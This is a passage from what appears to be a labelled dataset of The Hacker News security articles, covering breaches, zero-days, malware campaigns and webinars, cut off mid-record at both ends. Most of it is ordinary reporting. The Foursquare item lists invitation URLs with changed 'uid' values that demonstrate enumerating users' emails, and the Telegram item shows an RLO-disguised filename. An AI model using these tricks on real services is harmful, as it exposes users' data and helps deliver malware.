asserts that all evidence points towards the Mexican government which itself is behind the cyber espionage. ",Malware """4chan Hacked"", Most Popular Image-Bulletin Board Compromised",https://thehackernews.com/2014/04/4chan-Hacked-Image-Bulletin-Board.html,"The founder of 4chan, Christopher Poole, aka ""moot"" has confirmed few hours ago, in a blog post that the popular image-based bulletin board was hacked. The attacker gained access to the administrative functions and successfully hacked into one of 4chan's database by exploiting a website's software vulnerability last week. The motive behind the hack was to expose the posting habits of a specific user the attacker didn't like, moot wrote. It is believed that the software vulnerability allowed the attacker to hack into only the image-board moderation panels, and some tables in the 4chan back-end database. According to the blog post, the way hacker extracted the information from its database, 4chan knows the ""detailed logs of what was accessed"", which indicate that the ""primarily moderator account names"" and their ""credentials"" were targeted and compromised by the hacker. ""Due to the way the intruder extracted information from the database, we have detailed logs of what was accessed. The logs indicate that primarily moderator account names and credentials were targeted,"" reads the blog post. The hacker was able to access the Pass credentials of three 4chan Pass (paid account without CAPTCHAs system) users, who have been notified by the company shortly after the discovery of the attack and offered refunds along with the lifetime Passes. The founder of the 4chan assured its users that their financial information has not been compromised in the attack as 4chan doesn't process any payment information and all the payment information is ""processed securely"" by the Stripe. After 4chan aware of this software vulnerability exploited by the hacker, it was patched quickly and 4chan assured its users that they continue to review its software and systems to prevent future attacks and breaches. A week ago, Moderators of Social-sharing website Reddit were under attack after being accused of censoring posted links containing words like ""National Security Agency,"" ""Edward Snowden"" and even ""Bitcoin"" on the website's subreddit r/technology. The Reddit moderators have lost their focus of what they were there to do. Their job is to moderate effectively, but this secret censorship is a ""disaster"" as it lost the transparency between the user and the service. 4chan apologized for the inconvenience caused to its users, but this is not first time hacker targeted 4chan. Back in June 2012, the hacker UGNazi changed the DNS for 4chan and redirected its visitors to UGNazis Twitter account. ",Data_Breaches Foursquare vulnerability that exposes 45 million users' email addresses,https://thehackernews.com/2014/01/foursquare-vulnerability-that-exposes.html,"A location based Social Networking platform with 45 million users,'Foursquare' was vulnerable to the primary email address disclosed. Foursquare is a Smartphone application that gives you details of nearby cafes, bars, shops, parks using GPS location and also tells about your friends nearby. According to a Penetration tester and hacker 'Jamal Eddine', an attacker can extract email addresses of all 45 million users just by using a few lines of scripting tool. Basically the flaw exists in the Invitation system of the Foursquare app. While testing the app, he found that invitation received on the recipient's end actually disclosing the sender's email address, as shown above. Invitation URL: https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=64761059&sig=mmlx96RwGrQ2fJAg4OWZhAWnDvc%3D Where 'uid' parameter represents the sender's profile ID. Hacker noticed that the parameter in the Invitation URL can be modified in order to spoof the sender profile i.e. Just by modifying the value of 'uid' parameter, one can see the email ID of the respective user. If someone is a good programmer, then dumping the complete database won't be a difficult task. https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=35 https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=60 https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=65 https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=4444 And so forth... The same question still persist that what can be done if someone knows my name and my email id? Many of us use same mail account on all of the social networking sites i.e. Primary email address, and if your personal email address gets leaked from any of the website, someone can start sending you spam, malware or phishing attempts. I think you don't want to be phished by any hacking group like Syrian Electronic hacker or this information can easily aid other cyber attacks. In July, 2013, Similar vulnerability was reported on Facebook, discloses the primary email address of any Facebook user to hackers and spammers. As a responsible bug hunter, he reported the flaw to Foursquare's Security Team, and they have finally fixed the issue. ",Vulnerability Hackers Exploit 'Telegram Messenger' Zero-Day Flaw to Spread Malware,https://thehackernews.com/2018/02/hackers-exploit-telegram-messenger-zero.html,"A zero-day vulnerability has been discovered in the desktop version for end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash. The Telegram vulnerability was uncovered by security researcher Alexey Firsh from Kaspersky Lab last October and affects only the Windows client of Telegram messaging software. The flaw has actively been exploited in the wild since at least March 2017 by attackers who tricked victims into downloading malicious software onto their PCs that used their CPU power to mine cryptocurrencies or serve as a backdoor for attackers to remotely control the affected machine, according to a blogpost on Securelist. Here's How Telegram Vulnerability Works The vulnerability resides in the way Telegram Windows client handles the RLO (right-to-left override) Unicode character (U+202E), which is used for coding languages that are written from right to left, like Arabic or Hebrew. According to Kaspersky Lab, the malware creators used a hidden RLO Unicode character in the file name that reversed the order of the characters, thus renaming the file itself, and send it to Telegram users. For example, when an attacker sends a file named ""photo_high_re*U+202E*gnp.js"" in a message to a Telegram user, the file's name rendered on the users' screen flipping the last part. Therefore, the Telegram user will see an incoming PNG image file (as shown in the below image) instead of a JavaScript file, misleading into downloading malicious files disguised as the image. ""As a result, users downloaded hidden malware which was then installed on their computers,"" Kaspersky says in its press release published today. Kaspersky Lab reported the vulnerability to Telegram and the company has since patched the vulnerability in its products, as the Russian security firm said: ""at the time of publication, the zero-day flaw has not since been observed in messenger's products."" Hackers Used Telegram to Infect PCs with Cryptocurrency Miners During the analysis, Kaspersky researchers found several scenarios of zero-day exploitation in the wild by threat actors. Primarily, the flaw was actively exploited to deliver cryptocurrency mining malware, which uses the victim's PC computing power to mine different types of cryptocurrency including Monero, Zcash, Fantomcoin, and others. While analyzing the servers of malicious actors, the researchers also found archives containing a Telegram's local cache that had been stolen from victims. In another case, cybercriminals successfully exploited the vulnerability to install a backdoor trojan that used the Telegram API as a command and control protocol, allowing hackers to gain remote access to the victim's computer. ""After installation, it started to operate in a silent mode, which allowed the threat actor to remain unnoticed in the network and execute different commands including the further installation of spyware tools,"" the firm added. Firsh believes the zero-day vulnerability was exploited only by Russian cybercriminals, as ""all the exploitation cases that [the researchers] detected occurring in Russia,"" and a lot of artifacts pointed towards Russian cybercriminals. The best way to protect yourself from such attacks is not to download or open files from unknown or untrusted sources. The security firm also recommended users to avoid sharing any sensitive personal information in messaging apps and make sure to have a good antivirus software from reliable company installed on your systems. ",Malware Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners,https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html,"The Drupal vulnerability (CVE-2018-7600), dubbed Drupalgeddon2 that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. Drupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. However, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) exploit code was made widely available, and large-scale Internet scanning and exploitation attempts followed. At the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. The SANS Internet Storm Center spotted some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. The simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. A thread on SANS ISC Infosec forums also suggests that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. Researchers from security firm Volexity have also observed a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. The researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. Volexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. As we reported in our previous article, Imperva stats showed that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. For those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. Therefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. In its advisory, Drupal warned that ""sites not patched by Wednesday, 2018-04-11 may be compromised"" and ""simply updating Drupal will not remove backdoors or fix compromised sites."" Moreover, ""If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site."" Here's a guide Drupal team suggest to follow if your website has been hacked. ",Cyber_Attack TikTok Bug Could Have Exposed Users' Profile Data and Phone Numbers,https://thehackernews.com/2021/01/tiktok-bug-could-have-exposed-users.html,"Cybersecurity researchers on Tuesday disclosed a now-patched security flaw in TikTok that could have potentially enabled an attacker to build a database of the app's users and their associated phone numbers for future malicious activity. Although this flaw only impacts those users who have linked a phone number with their account or logged in with a phone number, a successful exploitation of the vulnerability could have resulted in data leakage and privacy violation, Check Point Research said in an analysis shared with The Hacker News. TikTok has deployed a fix to address the shortcoming following responsible disclosure from Check Point researchers. The newly discovered bug resides in TikTok's ""Find friends"" feature that allows users to sync their contacts with the service to identify potential people to follow. The contacts are uploaded to TikTok via an HTTP request in the form of a list that consists of hashed contact names and the corresponding phone numbers. The app, in the next step, sends out a second HTTP request that retrieves the TikTok profiles connected to the phone numbers sent in the previous request. This response includes profile names, phone numbers, photos, and other profile related information. While the upload and sync contact requests are limited to 500 contacts per day, per user, and per device, Check Point researchers found a way to get around the limitation by getting hold of the device identifier, session cookies set by the server, a unique token called ""X-Tt-Token"" that's set when logging into the account with SMS and simulate the whole process from an emulator running Android 6.0.1. It's worth noting that in order to request data from the TikTok application server, the HTTP requests must include X-Gorgon and X-Khronos headers for server verification, which ensures that the messages are not tampered with. But by modifying the HTTP requests — the number of contacts the attacker wants to sync — and re-signing them with an updated message signature, the flaw made it possible to automate the procedure of uploading and syncing contacts on a large scale and create a database of linked accounts and their connected phone numbers. This is far from the first time the popular video-sharing app has been found to contain security weaknesses. In January 2020, Check Point researchers discovered multiple vulnerabilities within the TikTok app that could have been exploited to get hold of user accounts and manipulate their content, including deleting videos, uploading unauthorized videos, making private ""hidden"" videos public, and revealing personal information saved on the account. Then in April, security researchers Talal Haj Bakry and Tommy Mysk exposed flaws in TikTok that made it possible for attackers to display forged videos, including those from verified accounts, by redirecting the app to a fake server hosting a collection of fake videos. Eventually, TikTok launched a bug bounty partnership with HackerOne last October to help users or security professionals flag technical concerns with the platform. Critical vulnerabilities (CVSS score 9 - 10) are eligible for payouts between $6,900 to $14,800, according to the program. ""Our primary motivation, this time around, was to explore the privacy of TikTok,"" said Oded Vanunu, head of products vulnerabilities research at Check Point. ""We were curious if the TikTok platform could be used to gain private user data. It turns out that the answer was yes, as we were able to bypass multiple protection mechanisms of TikTok that lead to privacy violation."" ""An attacker with that degree of sensitive information could perform a range of malicious activities, such as spear phishing or other criminal actions."" ",Cyber_Attack Hackers Exploit Recently Disclosed Microsoft Office Bug to Backdoor PCs,https://thehackernews.com/2017/11/cobalt-strike-malware.html,"A recently disclosed severe 17-year-old vulnerability in Microsoft Office that lets hackers install malware on targeted computers without user interaction is now being exploited in the wild to distribute a backdoor malware. First spotted by researchers at security firm Fortinet, the malware has been dubbed Cobalt because it uses a component from a powerful and legitimate penetration testing tool, called Cobalt Strike. Cobalt Strike is a form of software developed for Red Team Operations and Adversary Simulations for accessing covert channels of a system. The vulnerability (CVE-2017-11882) that Cobalt malware utilizes to deliver the backdoor is a memory-corruption issue that allows unauthenticated, remote attackers to execute malicious code on the targeted system when opened a malicious file and potentially take full control over it. This vulnerability impacts all versions of Microsoft Office and Windows operating system, though Microsoft has already released a patch update to address the issue. You can read more details and impact of the vulnerability in our previous article. Since cybercriminals are quite quick in taking advantage of newly disclosed vulnerabilities, the threat actors started delivering Cobalt malware using the CVE-2017-11882 exploit via spam just a few days after its disclosure. According to Fortinet researchers, the Cobalt malware is delivered through spam emails, which disguised as a notification from Visa regarding rule changes in Russia, with an attachment that includes a malicious RTF document, as shown. The email also contains a password-protected archive with login credentials provided in the email to unlock it in order to trick victims into believing that the email came from the legitimate financial service. ""This is [also] to prevent auto-analysis systems from extracting the malicious files for sandboxing and detection,"" Fortinet researchers Jasper Manual and Joie Salvio wrote. ""Since a copy of the malicious document is out in the open... so it's possible that this is only to trick the user into thinking that securities are in place, which is something one would expect in an email from a widely used financial service."" Once the document is opened, the user has displayed a plain document with the words ""Enable Editing."" However, a PowerShell script silently executes in the background, which eventually downloads a Cobalt Strike client to take control of the victim's machine. With control of the victim's system, hackers can ""initiate lateral movement procedures in the network by executing a wide array of commands,"" the researchers said. According to the researchers, cybercriminals are always in look for such vulnerabilities to exploit them for their malware campaigns, and due to ignoring software updates, a significant number of users out there left their systems unpatched, making them vulnerable to such attacks. The best way to protect your computer against the Cobalt malware attack is to download the patch for the CVE-2017-11882 vulnerability and update your systems immediately. ",Cyber_Attack iOS 13 Bug Lets 3rd-Party Keyboards Gain 'Full Access' — Even When You Deny,https://thehackernews.com/2019/09/ios-13-keyboard-apps.html,"Following the release of iOS 13 and iPadOS earlier this week, Apple has issued an advisory warning iPhone and iPad users of an unpatched security bug impacting third-party keyboard apps. On iOS, third-party keyboard extensions can run entirely standalone without access to external services and thus, are forbidden from storing what you type unless you grant ""full access"" permissions to enable some additional features through network access. However, in the brief security advisory, Apple says that an unpatched issue in iOS 13 and iPadOS could allow third-party keyboard apps to grant themselves ""full access"" permission to access what you are typing—even if you deny this permission request in the first place. It should be noted that the iOS 13 bug doesn't affect Apple's built-in keyboards or third-party keyboards that don't make use of full access. Instead, the bug only impacts users who have third-party keyboard apps—such as popular Gboard, Grammarly, and Swiftkey—installed on their iPhones or iPads, which are designed to request full access from users. Though having full access allows app developers to capture all keystroke data and everything you type, it's worth noting that likely no reputable third-party keyboard apps would by default abuse this issue. Even if that doesn't satisfy you, and you want to check if any of the installed third-party keyboards on your iPhone or iPad has enabled full access without your knowledge by exploiting this bug, you can open the Settings → General → Keyboard → Keyboards. Apple assured its users that the company is already working on a fix to address this issue, which it plans to release in its upcoming software update. Until Apple comes up with a fix, you can mitigate this issue by temporarily uninstalling all third-party keyboards from your device just to be on the safer side. ",Vulnerability LIVE Webinar: Major Lessons to be Learned from Top Cyber Attacks in 2020,https://thehackernews.com/2021/02/live-webinar-major-lessons-to-be.html,"We likely all agree that 2020 was a year we won't soon forget - for many reasons. One area particularly impacted last year was (and continues to be) cybersecurity. While Internet access allowed many businesses to continue functioning during the COVID-19 stay at home requirements, the unprecedented number of people accessing company assets remotely introduced many new challenges for cybersecurity professionals. With a history of leveraging societal maladies to their advantage, cyber criminals leverage the confusion and unpreparedness created by the global pandemic in their cyber attacks. In just the last two months of 2020, several high-profile organizations and government entities were successfully attacked using clever approaches that were overlooked by cybersecurity experts. Making sense of how attacks have changed and what new defensive strategies should be taken is no easy task. Cybersecurity company Cynet will help by reviewing the 2020 high profile attacks in depth and guide cybersecurity professionals for 2021 in an upcoming webinar (register here). Until then, what high profile attacks are they likely to explore? The Top 2020 Cyber Attacks Without enough space to cover all the top attacks in 2020, several significant breaches were predominantly accomplished by new techniques. SolarWinds The attack involved hackers compromising the infrastructure of SolarWinds, a company that produces a network and application monitoring platform called Orion. The attackers then used that access to produce and distribute trojanized updates to the software's users, including 425 of the US Fortune 500, the top ten US telecommunications companies, the top five US accounting firms, all branches of the US Military, the Pentagon, and the State Department, as well as hundreds of universities and colleges worldwide. Cybersecurity company FireEye was successfully breached using a malware-infected update to SolarWinds Orion. An additional malware, dubbed Supernova, also used the SolarWinds Orion product as its delivery method but was likely developed and used by a different threat actor. Software AG The second-largest software vendor in Germany and the seventh-largest in Europe, Software AG was reportedly hit by a Clop ransomware attack in October 2020. It was reported that the cyber-criminal gang had demanded a $23 million ransom. Sopra Steria Sopra Steria is a European information technology firm with 46,000 employees in 25 countries, providing a large array of IT services, including consulting, systems integration, and software development. In October 2020, Sopra Steria was attacked by what turned out to be a new version of the Ryuk ransomware, previously unknown to antivirus software providers and security agencies. Telegram Hackers with access to the system used for connecting mobile networks across the world were able to gain access to Telegram messenger and email data of high-profile individuals in the cryptocurrency business. In what is believed to be a targeted attack, the hackers were after two-factor authentication (2FA) login codes delivered over the short messaging system of the victim's mobile phone provider. What To Expect in 2021 It will be quite interesting to hear Cynet's perspective on what will unfold over the coming year. Ransomware shows no sign of abating, and attacks on third-party suppliers to gain access to their clients' environments will undoubtedly continue. A large remote workforce likely opens companies up to traditional social engineering attacks as well. In terms of defensive actions, third party risk management will certainly be top of mind following the SolarWinds fiasco. Remote endpoints and remote workers will need to be better protected. Automated response systems will certainly gain traction as reaction times to things like ransomware must accelerate to machine speed to prevent infections from propagating across the environment and locking up critical system assets. We're certainly in for a bumpy ride ahead. Look to cybersecurity experts steeped in protecting client organizations for insights and advice moving forward. Register for this live webinar here ",Cyber_Attack New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer,https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html,"A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces. The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous ""Royal Road"" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed ""PortDoor,"" according to Cybereason's Nocturnus threat intelligence team. ""Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,"" the researchers said in a write-up on Friday. Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over 85% of submarines in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines. Content of the weaponized RTF document Over the years, Royal Road has earned its place as a tool of choice among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. Known for exploiting multiple flaws in Microsoft's Equation Editor (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets. This newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of ""8.t,"" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called ""e.o"" to fetch the PortDoor implant, implying a new variant of the weaponizer in use. Said to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server. ""The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,"" the researchers said. ",Cyber_Attack ZeroCleare: New Iranian Data Wiper Malware Targeting Energy Sector,https://thehackernews.com/2019/12/zerocleare-data-wiper-malware.html,"Cybersecurity researchers have uncovered a new, previously undiscovered destructive data-wiping malware that is being used by state-sponsored hackers in the wild to target energy and industrial organizations in the Middle East. Dubbed ZeroCleare, the data wiper malware has been linked to not one but two Iranian state-sponsored hacking groups—APT34, also known as ITG13 and Oilrig, and Hive0081, also known as xHunt. A team of researchers at IBM who discovered the ZeroCleare malware says that the new wiper malware shares some high-level similarities with the infamous Shamoon, one of the most destructive malware families known for damaging 30,000 computers at Saudi Arabia's largest oil producer in 2012. Just like the Shamoon wiper malware, ZeroCleare also uses a legitimate hard disk driver called 'RawDisk by ElDos' to overwrite the master boot record (MBR) and disk partitions of targeted computers running the Windows operating system. Though EldoS driver is not signed, the malware still manages to run it by loading a vulnerable but signed Oracle's VirtualBox driver, exploiting it to bypass the signature checking mechanism and load the unsigned EldoS driver. ""To gain access to the device's core, ZeroCleare used an intentionally vulnerable [but signed VBoxDrv] driver and malicious PowerShell/Batch scripts to bypass Windows controls,"" the researchers said. To deploy the Zerocleare malware on as many computers in an organization as possible, attackers' first attempt to brute force network accounts passwords and then install ASPX web shells, like China Chopper and Tunna, by exploiting a SharePoint vulnerability. ""Adding these living-off-the-land tactics to the scheme, ZeroCleare was spread to numerous devices on the affected network, sowing the seeds of a destructive attack that could affect thousands of devices and cause disruption that could take months to recover from fully,"" the researchers said. The same threat actors also attempted to install legitimate remote access software called TeamViewer and used an obfuscated version of the Mimikatz credential-stealing tool to steal more network credentials of the compromised servers. Though researchers haven't disclosed names of any targeted organizations, they did confirm that there are two versions of Zerocleare that have been seen in the wild, one for each Windows architecture (32-bit and 64-bit), but only the 64-bit works. According to the researchers, the ZeroCleare attacks are not opportunistic and appear to be targeted operations against specific sectors and organizations. ""X-Force IRIS has been following a marked increase in destructive attacks in the past year, having logged a whopping 200 percent increase in the amount of destructive attacks in the past six months,"" the researchers said. ""Looking at the geographical region hit by the ZeroCleare malware, it is not the first time the Middle East has seen destructive attacks target its energy sector."" ",Malware [Webinar] How Cyber Attack Groups Are Spinning a Larger Ransomware Web,https://thehackernews.com/2021/06/webinar-how-cyber-attack-groups-are.html,"Organizations today already have an overwhelming number of dangers and threats to look out for, from spam to phishing attempts to new infiltration and ransomware tactics. There is no chance to rest, since attack groups are constantly looking for more effective means of infiltrating and infecting systems. Today, there are hundreds of groups devoted to infiltrating almost every industry, constantly devising more sophisticated methods to attack organizations. It's even more troubling to note that some groups have started to collaborate, creating complex and stealthy tactics that leave even the best security teams scrambling to respond. Such is the case noted by XDR Provider Cynet, as the company observes in its newest Research Webinar (register here). Cynet's research team noted that two of the most infamous attack groups – Lunar Spider and Wizard Spider – have started working together to infect organizations with ransomware. The development is certainly troubling, and the report shows why security teams and professionals must constantly be looking at the whole picture, not just the result of an attack. Combining attacks for greater impact Cynet's researchers first noticed something was amiss as they were studying IcedID malware, developed by Lunar Spider. Originally observed in the wild in 2017, IcedID is a banking Trojan that has targeted the financial sectors in both the US and Europe. After it was initially revealed, Lunar Spider shifted IcedID's modus operandi to enable it to deploy additional payloads, such as Cobalt Strike. The researchers also studied the CONTI ransomware, a relatively new attack approach developed by Wizard Spider that's already in the FBI's crosshairs. This ""ransomware-as-a-service"" (RaaS) has been spotted in the US and Europe and has already wreaked havoc on many organizations and networks. Cynet first suspected the connection between the two organizations as it was exploring a case of CONTI ransomware that used many familiar tactics, though not ones traditionally deployed by the Wizard Spider group. During the investigation, the team discovered that CONTI was being deployed through malware campaigns that used IcedID as an initial point of attack. After establishing persistence on targets' devices, IcedID deployed a CONTI ransomware variant to lock the network. Understanding the risks The new Cynet Research Webinar will dive deeper into the anatomy of this collaboration to explain why it's so troubling, but also how it can be detected and combatted. The webinar will discuss: The background of the attack groups. Both Lunar Spider and Wizard Spider are well known and highly dangerous. Their existing malware and other tools are widely popular and present in many notable breaches and attacks. Before exploring their tools, the webinar will break down each group. The increasing popularity of ransomware attacks. These tactics have become widespread and are expected to cost organizations hundreds of billions of dollars in the next decade. To truly comprehend how to combat this new attack tactic, it's worth establishing how ransomware works, and some common tactics. The anatomy of a combined IcedID and CONTI attack. The webinar will break down a case study of this new attack tactic. Unlike some other ransomware attacks, this new method uses techniques from both to create persistence, avoid detection, and lock systems before organizations can react. Moreover, they're increasingly using ""double extortion"" methods, which both lock data and threaten leaks if payment isn't received. You can register to the webinar here. ",Malware Zero-Day Exploits for Stealing OS X and iOS Passwords,https://thehackernews.com/2015/06/iphone-password-hacking.html,"I think you'll agree with me when I say: Apple devices are often considered to be more safe and secure than other devices that run on platforms like Windows and Android, but a recent study will make you think twice before making this statement. A group of security researchers have uncovered potentially deadly zero-day vulnerabilities in both iOS and OS X operating systems that could put iPhone/iPad or Mac owners at a high risk of cyber attacks. Researchers have created and published a malicious app on the App Store that was able to siphon users' personal data from the password storing Keychain in Apple's OS X, as well as steal passwords from iCloud, banking and email accounts. Dubbed XARA (cross-app resource access), the malware exploit app was able to bypass the OS X sandboxing mechanisms that are supposedly designed to prevent an app from accessing the credentials, contacts, and other important data related to other apps. The Consequences are Dire! In their paper, titled ""Unauthorized Cross-App Resource Access on MAC OS X and iOS"" [PDF], the researchers claim that once installed, their app can obtain data from applications such as Dropbox, Facebook and Evernote, along with the popular messaging app WeChat, and even siphon passwords from 1Password. ""The consequences are dire,"" researchers wrote in the paper. ""For example, on the latest Mac OS X 10.10.3, our sandboxed app successfully retrieved from the system's keychain the passwords and secret tokens of iCloud, email and all kinds of social networks...bank and Gmail passwords from Google Chrome."" The Researchers also noted that the hack attack is only possible when the attributes of the victim's keychain item are predictable. However, most of the services share the same name across Keychain stores. The Keychain issue stems from its inability to verify which app owns a credential in Keychain, and even the OS doesn't check for any suspicious activity. Bypassed Apple's App Store Security Checks The malicious app was also able to bypass the Apple's App store security checks that are designed to ensure one app can not gain access to other apps' data without permission. However, the more worrisome part regarding the malicious app is that it was approved by Apple for placement in its App Store, which is supposed to be pre-examine by Apple security engineers for potentially malicious apps. Apple did not immediately respond to a request for comment. The zero-day flaws discovered by the Indiana University boffins Xing; Xiaolong Bai; XiaoFeng Wang; and Kai Chen joined Tongxin Li, of Peking University, and Xiaojing Liao, of Georgia Institute of Technology, was reported to Apple last October, but the company requested a 6 month period before making it public. However, according to their paper, the issues persist and millions of Apple users can still be affected by these zero-day flaws. How to Protect your Devices A system-wide update to Apple's OS X and iOS is the only way to protect yourself fully against these vulnerabilities, the researchers said. However, we are patiently waiting to hear from Apple that how it's planning to resolve this huge issue. To protect yourselves against such vulnerabilities, users of all operating system platforms are advised to limit the apps they install on their devices to those that are needed and explicitly trusted. ",Vulnerability "Earn up to $15,000 for Hacking Microsoft Spartan Browser",https://thehackernews.com/2015/04/microsoft-project-spartan-browser-security.html,"If you're a bug hunter and love playing with codes than you could grab as much as US$15,000 from Microsoft for finding out vulnerabilities in its latest Project Spartan browser. Yes, $15,000! It seems like Redmond don't want to take a chance to let hackers and cyber criminals get their hands on the company's latest Windows 10 operating system. On Wednesday, Microsoft announced that the company will be expanding its bug bounty program ahead of the release of Windows 10, which will include a two-month hunt for vulnerabilities in its new web browser, Project Spartan. So, it's time for security researchers and hackers to earn extra cash from Microsoft. For those who are unaware… What's Project Spartan? Project Spartan is Microsoft's project for its new web browser to replace the oldest Internet Explorer from its Windows operating system. Though the project is still very much under the developmental stage, Microsoft is making every effort to make Spartan better and better as a browser. The day Microsoft launched this project till now, the browser has received as much steady stream of improvements as it could give a tough competition to Google's Chrome web browser. As it is said, the first impression is the last impression. Therefore, the technology giant is offering several payout categories which starts from $500 and ends with the top reaching bug bounty amount of $15,000 (11,000 Euro) for eligible vulnerabilities in Spartan, which includes… …Remote Code Execution (RCE) bugs, Sandbox Escapes as well as design-level security bugs. You have time beginning today till June 22, 2015 to submit your bug reports to the company. So don't be late. Also, those hackers and researchers who submitted vulnerability reports since the beginning of 2015 would also be rewarded if the discovered vulnerabilities meet the eligibility criteria. This new bug bounty program also offers payouts for vulnerabilities in Microsoft's Azure cloud platform, and Sway Web application tool, Jason Shirk of Microsoft's Security Response Center says in a blog post. The bug bounty offer for Azure will cover cloud services, virtual machines, Active Directory, storage and much more. Microsoft is also offering up to $100,000 USD to bypass active mitigations (such as ASLR and DEP) in the company's latest released version of the operating system, and ""a bonus of up to $50,000 USD for actionable defense techniques to the reported bypass,"" Microsoft says. So play, discover and submit your findings by including all your details in an email to secure@microsoft.com based on the company's requirements on this page. ",Vulnerability Hackers Exploit BlackBerry Browser Bug !,https://thehackernews.com/2011/03/hackers-exploit-blackberry-browser-bug.html,"Research in Motion has found a security flaw and recommended that user disable JavaScript in browsers on certain phones, threatening the BlackBerry maker's iron-clad reputation for security. ""The issue could result in remote code execution on affected BlackBerry smartphones,"" the Waterloo, Ontario-based company said. ""Successful exploitation of the vulnerability requires the user to browse to a website that the attacker has maliciously designed."" The flaw is in the WebKit browser that RIM includes in version 6 of its BlackBerry OS. RIM said hackers can steal data from users' memory cards on some BlackBerry devices. They can also install malware by exploiting the hole, but the company said that even if attacked, the phone's emails and contacts would be safe. The publicity is particularly bad for the company who stakes its reputation on the security and privacy of its service. RIM, which has been forced to use more third-party software to compete with the flashy features of other platforms, provides more targets to hack. The vulnerability was discovered at the ""Pwn2Own"" hacking contest last week. Although the contest winners were not allowed to publicize specifics of the vulnerabilities until companies have patched them, it's possible that malware authors are already aware of it. An iPhone 4 was also hacked during the contest. The contest could actually help RIM, though, if it drives focus on security. According to the coders who discovered the flaw, RIM's smartphone software doesn't make use of some important security techniques, and the company is heavily reliant on ""security by obscurity,"" the fallible strategy of hiding how software works to keep hackers at bay. ",Malware Cyber Attack Knocks Nearly a Million Routers Offline,https://thehackernews.com/2016/11/mirai-router-offline.html,"Mirai Botnet is getting stronger and more notorious each day that passes by. The reason: Insecure Internet-of-things Devices. Last month, the Mirai botnet knocked the entire Internet offline for a few hours, crippling some of the world's biggest and most popular websites. Now, more than 900,000 broadband routers belonging to Deutsche Telekom users in Germany knocked offline over the weekend following a supposed cyber-attack, affecting the telephony, television, and internet service in the country. The German Internet Service Provider, Deutsche Telekom, which offers various services to around 20 Million customers, confirmed on Facebook that as many as 900,000 customers suffered internet outages on Sunday and Monday. Millions of routers are said to have vulnerable to a critical Remote code Execution flaw in routers made by Zyxel and Speedport, wherein Internet port 7547 open to receive commands based on the TR-069 and related TR-064 protocols, which are meant to use by ISPs to manage your devices remotely. The same vulnerability affects Eir D1000 wireless routers (rebranded Zyxel Modem) deployed by Irish internet service provider Eircom, while there are no signs that these routers are actively exploited. According to Shodan search, around 41 Million devices leave port 7547 open, while about 5 Million expose TR-064 services to the outside world. According to an advisory published by the SANS Internet Storm Center, honeypot servers posing as vulnerable routers are receiving exploit code every 5-10 minutes for each target IP. An intercepted packet showed how a remote code execution flaw in the part of a SOAP request was used to download and execute a file in order to infect the vulnerable device. Security researchers at BadCyber also analyzed one of the malicious payloads that were delivered during the attacks and discovered that the attack originated from a known Mirai's command-and-control server. ""The 